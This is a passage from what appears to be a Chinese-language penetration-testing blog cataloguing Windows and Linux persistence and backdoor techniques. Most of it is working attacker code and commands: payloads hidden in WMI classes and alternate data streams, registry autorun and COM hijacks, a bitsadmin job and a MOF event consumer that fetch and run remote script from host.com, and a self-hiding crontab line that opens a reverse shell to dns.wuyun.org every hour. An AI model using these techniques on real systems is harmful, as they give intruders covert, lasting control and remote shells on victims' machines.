title="2、常用的存储Payload位置"></a>2、常用的存储Payload位置</h5><p><strong>WMI</strong> :<br>存储:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,$null)</span></span><span class="line"><span style="color: #babed8">$StaticClass.Name = 'Win32_Command'</span></span><span class="line"><span style="color: #babed8">$StaticClass.Put()</span></span><span class="line"><span style="color: #babed8">$StaticClass.Properties.Add('Command' , $Payload)</span></span><span class="line"><span style="color: #babed8">$StaticClass.Put() </span></span></code></pre></div><p>读取:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value</span></span></code></pre></div><p><strong>包含数字签名的PE文件</strong><br>利用文件hash的算法缺陷,向PE文件中隐藏Payload,同时不影响该PE文件的数字签名<br><strong>特殊ADS</strong><br>…</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">type putty.exe > ...:putty.exe</span></span><span class="line"><span style="color: #babed8">wmic process call create c:\test\ads\...:putty.exe</span></span></code></pre></div><p>特殊COM文件</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">type putty.exe > \\.\C:\test\ads\COM1:putty.exe</span></span><span class="line"><span style="color: #babed8">wmic process call create \\.\C:\test\ads\COM1:putty.exe</span></span></code></pre></div><p>磁盘根目录</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">type putty.exe >C:\:putty.exe </span></span><span class="line"><span style="color: #babed8">wmic process call create C:\:putty.exe</span></span></code></pre></div><h5 id="3、Run-RunOnce-Keys"><a href="#3、Run-RunOnce-Keys" class="headerlink" title="3、Run/RunOnce Keys"></a>3、Run/RunOnce Keys</h5><p>用户级 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</span></span><span class="line"><span style="color: #babed8">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</span></span></code></pre></div><p>管理员 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</span></span><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</span></span><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</span></span></code></pre></div><h5 id="4、BootExecute-Key"><a href="#4、BootExecute-Key" class="headerlink" title="4、BootExecute Key"></a>4、BootExecute Key</h5><p>由于smss.exe在Windows子系统加载之前启动,因此会调用配置子系统来加载当前的配置单元,具体注册表键值为:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKLM\SYSTEM\CurrentControlSet\Control\hivelist</span></span><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Session Manager</span></span></code></pre></div><h5 id="5、Userinit-Key"><a href="#5、Userinit-Key" class="headerlink" title="5、Userinit Key"></a>5、Userinit Key</h5><p>WinLogon进程加载的login scripts,具体键值:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon</span></span></code></pre></div><h5 id="6、Startup-Keys"><a href="#6、Startup-Keys" class="headerlink" title="6、Startup Keys"></a>6、Startup Keys</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</span></span><span class="line"><span style="color: #babed8">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</span></span><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</span></span><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</span></span></code></pre></div><h5 id="7、Services"><a href="#7、Services" class="headerlink" title="7、Services"></a>7、Services</h5><p>创建服务 </p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">sc create [ServerName] binPath= BinaryPathName</span></span></code></pre></div><h5 id="8、Browser-Helper-Objects"><a href="#8、Browser-Helper-Objects" class="headerlink" title="8、Browser Helper Objects"></a>8、Browser Helper Objects</h5><p>本质上是Internet Explorer启动时加载的DLL模块</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects</span></span></code></pre></div><h5 id="9、AppInit-DLLs"><a href="#9、AppInit-DLLs" class="headerlink" title="9、AppInit_DLLs"></a>9、AppInit_DLLs</h5><p>加载User32.dll会加载的DLL</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs</span></span></code></pre></div><h5 id="10、文件关联"><a href="#10、文件关联" class="headerlink" title="10、文件关联"></a>10、文件关联</h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKEY_LOCAL_MACHINE\Software\Classes</span></span><span class="line"><span style="color: #babed8">HKEY_CLASSES_ROOT</span></span></code></pre></div><h5 id="11、bitsadmin"><a href="#11、bitsadmin" class="headerlink" title="11、bitsadmin"></a>11、<a href="http://www.liuhaihua.cn/archives/357579.html">bitsadmin</a></h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">bitsadmin /create backdoor</span></span><span class="line"><span style="color: #babed8">bitsadmin /addfile backdoor %comspec% %temp%\cmd.exe</span></span><span class="line"><span style="color: #babed8">bitsadmin.exe /SetNotifyCmdLine backdoor regsvr32.exe "/u /s /i:https://host.com/calc.sct scrobj.dll"</span></span><span class="line"><span style="color: #babed8">bitsadmin /Resume backdoor</span></span></code></pre></div><h5 id="12、mof"><a href="#12、mof" class="headerlink" title="12、mof "></a>12、<a href="https://evi1cg.me/archives/Powershell_MOF_Backdoor.html">mof </a></h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">pragma namespace("\\\\.\\root\\subscription") </span></span><span class="line"><span style="color: #babed8">instance of __EventFilter as $EventFilter</span></span><span class="line"><span style="color: #babed8">{</span></span><span class="line"><span style="color: #babed8">EventNamespace = "Root\\Cimv2";</span></span><span class="line"><span style="color: #babed8">Name = "filtP1";</span></span><span class="line"><span style="color: #babed8">Query = "Select * From __InstanceModificationEvent "</span></span><span class="line"><span style="color: #babed8">"Where TargetInstance Isa \"Win32_LocalTime\" "</span></span><span class="line"><span style="color: #babed8">"And TargetInstance.Second = 1";</span></span><span class="line"><span style="color: #babed8">QueryLanguage = "WQL";</span></span><span class="line"><span style="color: #babed8">}; </span></span><span class="line"><span style="color: #babed8">instance of ActiveScriptEventConsumer as $Consumer</span></span><span class="line"><span style="color: #babed8">{</span></span><span class="line"><span style="color: #babed8">Name = "consP1";</span></span><span class="line"><span style="color: #babed8">ScriptingEngine = "JScript";</span></span><span class="line"><span style="color: #babed8">ScriptText = "GetObject(\"script:https://host.com/test\")";</span></span><span class="line"><span style="color: #babed8">}; </span></span><span class="line"><span style="color: #babed8">instance of __FilterToConsumerBinding</span></span><span class="line"><span style="color: #babed8">{</span></span><span class="line"><span style="color: #babed8">Consumer = $Consumer;</span></span><span class="line"><span style="color: #babed8">Filter = $EventFilter;</span></span><span class="line"><span style="color: #babed8">};</span></span></code></pre></div><p>管理员执行:</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">mofcomp test.mof</span></span></code></pre></div><h5 id="13、wmi"><a href="#13、wmi" class="headerlink" title="13、wmi"></a>13、<a href="https://3gstudent.github.io/Study-Notes-of-WMI-Persistence-using-wmic.exe">wmi</a></h5><p>每隔60秒执行一次notepad.exe</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="BotFilter82", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"</span></span><span class="line"><span style="color: #babed8">wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="BotConsumer23", ExecutablePath="C:\Windows\System32\notepad.exe",CommandLineTemplate="C:\Windows\System32\notepad.exe"</span></span><span class="line"><span style="color: #babed8">wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"BotFilter82\"", Consumer="CommandLineEventConsumer.Name=\"BotConsumer23\""</span></span></code></pre></div><h5 id="14、Userland-Persistence-With-Scheduled-Tasks"><a href="#14、Userland-Persistence-With-Scheduled-Tasks" class="headerlink" title="14、Userland Persistence With Scheduled Tasks"></a>14、<a href="https://3gstudent.github.io/Userland-registry-hijacking">Userland Persistence With Scheduled Tasks</a></h5><p>劫持计划任务UserTask,在系统启动时加载dll</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">function Invoke-ScheduledTaskComHandlerUserTask</span></span><span class="line"><span style="color: #babed8">{</span></span><span class="line"><span style="color: #babed8">[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]</span></span><span class="line"><span style="color: #babed8">Param (</span></span><span class="line"><span style="color: #babed8">[Parameter(Mandatory = $True)]</span></span><span class="line"><span style="color: #babed8">[ValidateNotNullOrEmpty()]</span></span><span class="line"><span style="color: #babed8">[String]</span></span><span class="line"><span style="color: #babed8">$Command,</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">[Switch]</span></span><span class="line"><span style="color: #babed8">$Force</span></span><span class="line"><span style="color: #babed8">)</span></span><span class="line"><span style="color: #babed8">$ScheduledTaskCommandPath = "HKCU:\Software\Classes\CLSID\{58fb76b9-ac85-4e55-ac04-427593b1d060}\InprocServer32"</span></span><span class="line"><span style="color: #babed8">if ($Force -or ((Get-ItemProperty -Path $ScheduledTaskCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){</span></span><span class="line"><span style="color: #babed8">New-Item $ScheduledTaskCommandPath -Force |</span></span><span class="line"><span style="color: #babed8">New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null</span></span><span class="line"><span style="color: #babed8">}else{</span></span><span class="line"><span style="color: #babed8">Write-Verbose "Key already exists, consider using -Force"</span></span><span class="line"><span style="color: #babed8">exit</span></span><span class="line"><span style="color: #babed8">}</span></span><span class="line"><span style="color: #babed8"></span></span><span class="line"><span style="color: #babed8">if (Test-Path $ScheduledTaskCommandPath) {</span></span><span class="line"><span style="color: #babed8">Write-Verbose "Created registry entries to hijack the UserTask"</span></span><span class="line"><span style="color: #babed8">}else{</span></span><span class="line"><span style="color: #babed8">Write-Warning "Failed to create registry key, exiting"</span></span><span class="line"><span style="color: #babed8">exit</span></span><span class="line"><span style="color: #babed8">} </span></span><span class="line"><span style="color: #babed8">}</span></span><span class="line"><span style="color: #babed8">Invoke-ScheduledTaskComHandlerUserTask -Command "C:\test\testmsg.dll" -Verbose</span></span></code></pre></div><h5 id="15、Netsh"><a href="#15、Netsh" class="headerlink" title="15、Netsh"></a>15、<a href="https://3gstudent.github.io/Netsh-persistence">Netsh</a></h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">netsh add helper c:\test\netshtest.dll</span></span></code></pre></div><p>后门触发:每次调用netsh</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>dll编写:<a href="https://github.com/outflanknl/NetshHelperBeacon">https://github.com/outflanknl/NetshHelperBeacon</a></p></blockquote><h5 id="16、Shim"><a href="#16、Shim" class="headerlink" title="16、Shim"></a>16、<a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Compatibility-Shims">Shim</a></h5><p>常用方式:<br>InjectDll<br>RedirectShortcut<br>RedirectEXE</p><h5 id="17、DLL劫持"><a href="#17、DLL劫持" class="headerlink" title="17、DLL劫持"></a>17、<a href="https://3gstudent.github.io/DLL%E5%8A%AB%E6%8C%81%E6%BC%8F%E6%B4%9E%E8%87%AA%E5%8A%A8%E5%8C%96%E8%AF%86%E5%88%AB%E5%B7%A5%E5%85%B7Rattler%E6%B5%8B%E8%AF%95">DLL劫持</a></h5><p>通过Rattler自动枚举进程,检测是否存在可用dll劫持利用的进程<br>使用:Procmon半自动测试更精准,常规生成的dll会导致程序执行报错或中断,使用AheadLib配合生成dll劫持利用源码不会影响程序执行<br>工具:<a href="https://github.com/sensepost/rattler">https://github.com/sensepost/rattler</a><br>工具:<a href="https://github.com/Yonsm/AheadLib">https://github.com/Yonsm/AheadLib</a></p><h5 id="18、DoubleAgent"><a href="#18、DoubleAgent" class="headerlink" title="18、DoubleAgent "></a>18、<a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84Application-Verifier(DoubleAgent%E5%88%A9%E7%94%A8%E4%BB%8B%E7%BB%8D)">DoubleAgent </a></h5><p>编写自定义Verifier provider DLL<br>通过Application Verifier进行安装<br>注入到目标进程执行payload<br>每当目标进程启动,均会执行payload,相当于一个自启动的方式<br>POC : <a href="https://github.com/Cybellum/DoubleAgent">https://github.com/Cybellum/DoubleAgent</a></p><h5 id="19、waitfor-exe"><a href="#19、waitfor-exe" class="headerlink" title="19、waitfor.exe "></a>19、<a href="https://3gstudent.github.io/Use-Waitfor.exe-to-maintain-persistence">waitfor.exe </a></h5><p>不支持自启动,但可远程主动激活,后台进程显示为waitfor.exe<br>POC : <a href="https://github.com/3gstudent/Waitfor-Persistence">https://github.com/3gstudent/Waitfor-Persistence</a></p><h5 id="20、AppDomainManager"><a href="#20、AppDomainManager" class="headerlink" title="20、AppDomainManager"></a>20、<a href="https://3gstudent.github.io/Use-AppDomainManager-to-maintain-persistence">AppDomainManager</a></h5><p>针对.Net程序,通过修改AppDomainManager能够劫持.Net程序的启动过程。如果劫持了系统常见.Net程序如powershell.exe的启动过程,向其添加payload,就能实现一种被动的后门触发机制</p><h5 id="21、Office"><a href="#21、Office" class="headerlink" title="21、Office"></a>21、Office</h5><p><a href="https://3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91DLL%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8">劫持Office软件的特定功能</a>:通过dll劫持,在Office软件执行特定功能时触发后门<br><a href="https://3gstudent.github.io/%E5%88%A9%E7%94%A8VSTO%E5%AE%9E%E7%8E%B0%E7%9A%84office%E5%90%8E%E9%97%A8">利用VSTO实现的office后门</a><br><a href="https://github.com/3gstudent/Office-Persistence">Office加载项</a></p><ul><li>Word WLL </li><li>Excel XLL </li><li>Excel VBA add-ins </li><li>PowerPoint VBA add-ins</li></ul><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>参考1 :<a href="https://3gstudent.github.io/Use-Office-to-maintain-persistence">https://3gstudent.github.io/Use-Office-to-maintain-persistence</a></p></blockquote><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>参考2 :<a href="https://3gstudent.github.io/Office-Persistence-on-x64-operating-system">https://3gstudent.github.io/Office-Persistence-on-x64-operating-system</a></p></blockquote><h5 id="22、CLR"><a href="#22、CLR" class="headerlink" title="22、CLR"></a>22、<a href="https://3gstudent.github.io/Use-CLR-to-maintain-persistence">CLR</a></h5><p>无需管理员权限的后门,并能够劫持所有.Net程序<br>POC:<a href="https://github.com/3gstudent/CLR-Injection">https://github.com/3gstudent/CLR-Injection</a></p><h5 id="23、msdtc"><a href="#23、msdtc" class="headerlink" title="23、msdtc"></a>23、<a href="https://3gstudent.github.io/Use-msdtc-to-maintain-persistence">msdtc</a></h5><p>利用MSDTC服务加载dll,实现自启动,并绕过Autoruns对启动项的检测<br>利用:向 %windir%\system32\目录添加dll并重命名为oci.dll</p><h5 id="24、Hijack-CAccPropServicesClass-and-MMDeviceEnumerato"><a href="#24、Hijack-CAccPropServicesClass-and-MMDeviceEnumerato" class="headerlink" title="24、Hijack CAccPropServicesClass and MMDeviceEnumerato"></a>24、<a href="https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-CAccPropServicesClass-and-MMDeviceEnumerator">Hijack CAccPropServicesClass and MMDeviceEnumerato</a></h5><p>利用COM组件,不需要重启系统,不需要管理员权限<br>通过修改注册表实现<br>POC:<a href="https://github.com/3gstudent/COM-Object-hijacking">https://github.com/3gstudent/COM-Object-hijacking</a> </p><h5 id="25、Hijack-explorer-exe"><a href="#25、Hijack-explorer-exe" class="headerlink" title="25、Hijack explorer.exe"></a>25、<a href="https://3gstudent.github.io/Use-COM-Object-hijacking-to-maintain-persistence-Hijack-explorer.exe">Hijack explorer.exe</a></h5><p>COM组件劫持,不需要重启系统,不需要管理员权限<br>通过修改注册表实现</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">HKCU\Software\Classes\CLSID{42aedc87-2188-41fd-b9a3-0c966feabec1}</span></span><span class="line"><span style="color: #babed8">HKCU\Software\Classes\CLSID{fbeb8a05-beee-4442-804e-409d6c4515e9}</span></span><span class="line"><span style="color: #babed8">HKCU\Software\Classes\CLSID{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}</span></span><span class="line"><span style="color: #babed8">HKCU\Software\Classes\Wow6432Node\CLSID{BCDE0395-E52F-467C-8E3D-C4579291692E}</span></span></code></pre></div><h5 id="26、Windows-FAX-DLL-Injection"><a href="#26、Windows-FAX-DLL-Injection" class="headerlink" title="26、Windows FAX DLL Injection"></a>26、Windows FAX DLL Injection</h5><p>通过DLL劫持,劫持Explorer.exe对<code>fxsst.dll</code>的加载<br>Explorer.exe在启动时会加载<code>c:\Windows\System32\fxsst.dll</code>(服务默认开启,用于传真服务)将payload.dll保存在<code>c:\Windows\fxsst.dll</code>,能够实现dll劫持,劫持Explorer.exe对<code>fxsst.dll</code>的加载</p><h5 id="27、特殊注册表键值"><a href="#27、特殊注册表键值" class="headerlink" title="27、特殊注册表键值"></a>27、特殊注册表键值</h5><p>在注册表启动项创建特殊名称的注册表键值,用户正常情况下无法读取(使用Win32 API),但系统能够执行(使用Native API)。</p><p><a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E5%88%9B%E5%BB%BA">《渗透技巧——“隐藏”注册表的创建》</a></p><p><a href="https://3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%9A%90%E8%97%8F-%E6%B3%A8%E5%86%8C%E8%A1%A8%E7%9A%84%E6%9B%B4%E5%A4%9A%E6%B5%8B%E8%AF%95">《渗透技巧——“隐藏”注册表的更多测试》</a></p><h5 id="28、快捷方式后门"><a href="#28、快捷方式后门" class="headerlink" title="28、快捷方式后门"></a>28、快捷方式后门</h5><p>替换我的电脑快捷方式启动参数<br>POC : <a href="https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1">https://github.com/Ridter/Pentest/blob/master/powershell/MyShell/Backdoor/LNK_backdoor.ps1</a></p><h5 id="29、Logon-Scripts"><a href="#29、Logon-Scripts" class="headerlink" title="29、Logon Scripts"></a>29、<a href="https://3gstudent.github.io/Use-Logon-Scripts-to-maintain-persistence">Logon Scripts</a></h5><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">New-ItemProperty "HKCU:\Environment\" UserInitMprLogonScript -value "c:\test\11.bat" -propertyType string | Out-Null</span></span></code></pre></div><h5 id="30、Password-Filter-DLL"><a href="#30、Password-Filter-DLL" class="headerlink" title="30、Password Filter DLL"></a>30、<a href="https://3gstudent.github.io/Password-Filter-DLL%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8">Password Filter DLL</a></h5><h5 id="31、利用BHO实现IE浏览器劫持"><a href="#31、利用BHO实现IE浏览器劫持" class="headerlink" title="31、利用BHO实现IE浏览器劫持"></a>31、<a href="https://3gstudent.github.io/%E5%88%A9%E7%94%A8BHO%E5%AE%9E%E7%8E%B0IE%E6%B5%8F%E8%A7%88%E5%99%A8%E5%8A%AB%E6%8C%81">利用BHO实现IE浏览器劫持</a></h5><h4 id="Linux-2"><a href="#Linux-2" class="headerlink" title="Linux"></a>Linux</h4><h5 id="crontab"><a href="#crontab" class="headerlink" title="crontab"></a>crontab</h5><p>每60分钟反弹一次shell给dns.wuyun.org的53端口</p><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">#!bash</span></span><span class="line"><span style="color: #babed8">(crontab -l;printf "*/60 * * * * exec 9<> /dev/tcp/dns.wuyun.org/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i;\rno crontab for `whoami`%100c\n")|crontab -</span></span></code></pre></div><h5 id="硬链接sshd"><a href="#硬链接sshd" class="headerlink" 